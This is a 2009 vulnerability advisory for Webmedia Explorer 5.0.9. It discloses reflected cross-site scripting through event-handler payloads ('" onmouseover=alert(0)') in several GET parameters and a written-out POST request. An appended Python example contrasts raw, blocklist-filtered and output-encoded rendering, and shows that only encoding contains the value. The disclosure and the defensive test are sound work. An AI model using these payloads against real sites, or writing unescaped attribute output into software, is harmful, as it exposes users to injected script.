Webmedia Explorer - XSS Vulnerability

2009.06.21
Credit: MaXe
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Webmedia Explorer - Cross Site Scripting Vulnerability

Version Affected: 5.0.9 (newest is: 5.10.0)

Info: Webmedia Explorer is the alternative CMS engine that reads the hard disc and generates a website realtime taking advantage of a very powerful rendering and data fetching caching system.

Credits: InterN0T

External Links: http://www.webmediaexplorer.com/

-:: The Advisory ::-

Vulnerable Function / ID Calls: search, tag, bookmark & "another function that registers all extra calls"

Cross Site Scripting: (by using event handlers)

http://[HOST]/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over the search field.

http://[HOST]/webmediaexpl/htdocs/?tag=" onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over a tag.

http://[HOST]/webmediaexpl/htdocs/?view=2&thisisnotarealcall=')" onmouseover=alert(0) > ---
-- Will be executed when a user moves his mouse over the column field. (unlikely)

http://[HOST]/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > ---&action=edit
-- Requires admin access, however since this is a hidden tag exploitation is highly unlikely.

POST Method - Cross Site Scripting:

Host: [HOST]
User-Agent: FireFox-3-RoXx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[HOST]/webmediaexpl/htdocs/index.php?action=remember
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

Post Content:
email=%22+onmouseover%3Dalert%280%29+%3E+---&captcha_code=
(the following was sent: " onmouseover=alert(0) > --- )

-:: Solution ::-

Filtering event handlers should do the trick.

Conclusion: A pretty secure system overall, nice to see.

Reference: http://forum.intern0t.net/intern0t-advisories/1123-intern0t-webmedia-explorer-cross-site-scripting-vulnerability.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Bugtraq (SecurityFocus) contacted the 12th June.

All of the best,
MaXe
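The solution above names event-handler filtering. The following added example (not part of the advisory and not Webmedia Explorer code) renders the advisory's search= value three ways and parses the result, so a maintainer can check whether the value stays inside the attribute it was written into. The input tag is an assumed stand-in for the search field, and the function names are hypothetical; in the product's PHP the matching encoding call is htmlspecialchars() with ENT_QUOTES.

```python
import html
import re
from html.parser import HTMLParser

# Value of the search= parameter as given in the advisory.
PAYLOAD = '" onmouseover=alert(0) ---'
# Assumed stand-in for the search field markup; not taken from the product.
TEMPLATE = '<input type="text" name="search" value="%s">'
TEMPLATE_ATTRS = {"type", "name", "value"}

def render_raw(value):
    # Vulnerable pattern: request value copied into a quoted attribute as-is.
    return TEMPLATE % value

def render_filtered(value):
    # Blocklist: strip on<event>= names but leave the double quote alone.
    return TEMPLATE % re.sub(r"on\w+\s*=", "", value, flags=re.I)

def render_encoded(value):
    # Output encoding: '"' becomes &quot;, so the value cannot close the attribute.
    return TEMPLATE % html.escape(value, quote=True)

class _InputAttrs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)

def audit(markup, submitted):
    # Parse the rendered tag and report what the submitted value turned into.
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    extra = sorted(set(parser.attrs) - TEMPLATE_ATTRS)
    return {
        "contained": parser.attrs.get("value") == submitted and not extra,
        "event_handlers": [name for name in extra if name.startswith("on")],
    }

if __name__ == "__main__":
    for render in (render_raw, render_filtered, render_encoded):
        print(render.__name__, audit(render(PAYLOAD), PAYLOAD))
```

Only the encoded rendering reports the value as contained: the filtered one no longer carries an event handler, but the quote still ends the attribute and the rest of the value is parsed as markup.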

References:

http://www.securityfocus.com/archive/1/archive/1/504307/100/0/threaded

